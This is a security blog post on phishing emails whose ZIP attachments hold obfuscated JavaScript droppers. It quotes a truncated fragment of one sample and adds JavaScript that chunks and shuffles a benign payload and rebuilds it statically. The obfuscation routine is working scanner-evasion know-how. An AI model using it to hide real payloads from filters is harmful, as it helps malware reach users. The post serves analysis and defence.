Why You Still Receive Phishing Emails and Malware: Scrambling The Code

--

Malware authors use scrambled (obfuscated) JavaScript to get past email gateways and anti-virus scanners, which largely match on known code patterns and strings. In this example we have an email with a ZIP attachment. The initial email tries to panic the user with the threat of a court appearance:

When we open the ZIP file, it contains a JavaScript (.js) file. On Windows, double-clicking a .js file does not open it in the browser: it is executed by Windows Script Host, with the user's privileges and none of the browser sandbox, so the ZIP is just a wrapper to get the script past filters and onto the desktop:

Basically this is a scrambled JavaScript file which hides the actual code. It uses standard obfuscation methods: newlines are removed, the real script is cut into small string chunks, each chunk is wrapped in its own numbered function (stkg179, stkg231 and so on), and the functions are written out in random order, so no readable fragment of the payload appears anywhere in the file. A loop at the end appears to call the functions in numeric order, so the chunks are only reassembled, and the real code only exists, at run time. The hex string in stroke is a further encoded value whose decoding routine is not visible in the listing. A scanner that does not execute or emulate the script sees nothing but harmless-looking string literals.

Overall, the file defines the chunk functions and then calls them in order with:

var stroke="5557545E171114140B1610240A0110130B160F170D09174A070B09";
function stkg179() { vmy('un(fn'); return gj(); };
function stkg231() { vmy('(681'); return gj(); };
function stkg93() { vmy('veXOb'); return gj(); };
function stkg118() { vmy(' x'); return gj(); };
function stkg71() { vmy('h.'); return gj(); };
for (var pcrs=1; pcrs<=237…
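To make the technique concrete, here is an added example in JavaScript; it is not the dropper's code and not from the original post. It models the scheme above in both directions: obfuscate() cuts a benign, constructed payload into chunks, wraps each chunk in a numbered stkgN() function, shuffles the definitions and strips newlines, and deobfuscate() does what an analyst would do with the real sample: pull the chunks back out with a regular expression and join them by index, without ever executing the script. The names stkg, vmy, gj and pcrs follow the sample; the seeded random generator, the chunk size and the assumption that single-quoted chunks only use \' and \\ escapes are mine.

```javascript
// Added example (not from the original post): a minimal model of the
// "split into chunks, wrap each chunk in a function, shuffle the functions"
// obfuscation seen in the sample, plus a static deobfuscator that rebuilds
// the payload without running it. The payload below is constructed and benign.

// Deterministic PRNG so the shuffled output is reproducible (assumption:
// real droppers use whatever randomness their generator provides).
function lcg(seed) {
  let s = seed >>> 0;
  return () => (s = (Math.imul(s, 1664525) + 1013904223) >>> 0) / 4294967296;
}

function shuffle(arr, rand) {
  for (let i = arr.length - 1; i > 0; i--) {
    const j = Math.floor(rand() * (i + 1));
    [arr[i], arr[j]] = [arr[j], arr[i]];
  }
  return arr;
}

// Split `payload` into chunks of `chunkSize` characters, emit one function
// per chunk in random order, then a loop that calls them in index order.
// Each chunk is a JSON string literal, so quotes and backslashes are escaped.
function obfuscate(payload, chunkSize, seed = 1) {
  const chunks = [];
  for (let i = 0; i < payload.length; i += chunkSize) {
    chunks.push(payload.slice(i, i + chunkSize));
  }
  const defs = chunks.map((c, i) =>
    `function stkg${i + 1}() { vmy(${JSON.stringify(c)}); return gj(); };`);
  shuffle(defs, lcg(seed));
  // vmy appends to a buffer, gj returns it; the loop rebuilds and evals.
  const runtime = [
    'var acc = "";',
    'function vmy(s) { acc += s; }',
    'function gj() { return acc; }',
    `for (var pcrs=1; pcrs<=${chunks.length}; pcrs++) { eval("stkg"+pcrs+"()"); }`,
    'eval(gj());',
  ];
  return defs.concat(runtime).join(''); // newlines removed, as in the sample
}

// Static reassembly: find every `function stkgN() { vmy(<literal>)`, decode
// the literal, and join the chunks by N. Nothing from `source` is executed.
function deobfuscate(source) {
  const re = /function\s+stkg(\d+)\s*\(\)\s*\{\s*vmy\(\s*('(?:[^'\\]|\\.)*'|"(?:[^"\\]|\\.)*")\s*\)/g;
  const pieces = new Map();
  let m;
  while ((m = re.exec(source)) !== null) {
    const lit = m[2];
    // Double-quoted literals are valid JSON; single-quoted ones (as in the
    // sample) get a simple backslash unescape (assumption: only \' and \\).
    const text = lit[0] === '"' ? JSON.parse(lit) : lit.slice(1, -1).replace(/\\(.)/g, '$1');
    pieces.set(Number(m[1]), text);
  }
  if (pieces.size === 0) throw new Error('no stkg chunk functions found');
  // Prefer the loop bound (pcrs<=N) as the chunk count; fall back to the
  // highest index seen. Any gap means the listing is incomplete or we
  // mis-parsed a chunk, which is worth knowing before trusting the output.
  const loop = /pcrs\s*<=\s*(\d+)/.exec(source);
  const n = loop ? Number(loop[1]) : Math.max(...pieces.keys());
  const missing = [];
  for (let i = 1; i <= n; i++) if (!pieces.has(i)) missing.push(i);
  if (missing.length) throw new Error('missing chunk(s): ' + missing.join(','));
  return Array.from({ length: n }, (_, i) => pieces.get(i + 1)).join('');
}

// Constructed, benign payload standing in for the dropper's real code.
const SAMPLE_PAYLOAD = 'var msg = "it\'s only a test"; console.log(msg);';
const OBFUSCATED = obfuscate(SAMPLE_PAYLOAD, 5, 42);

console.log(OBFUSCATED);
console.log('round trip ok:', deobfuscate(OBFUSCATED) === SAMPLE_PAYLOAD);
```

With a chunk size of 5 the string console.log never appears contiguously in the obfuscated file, which is exactly why signature-based scanning misses it; the static deobfuscator recovers it because it reasons about the structure of the loader rather than its strings. The same approach, adjusted for the function-name prefix and the loop variable, is the first thing to try on a real sample of this family before resorting to running it in a sandbox.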

--

Prof Bill Buchanan OBE FRSE
ASecuritySite: When Bob Met Alice

Professor of Cryptography. Serial innovator. Believer in fairness, justice & freedom. Based in Edinburgh. Old World Breaker. New World Creator. Building trust.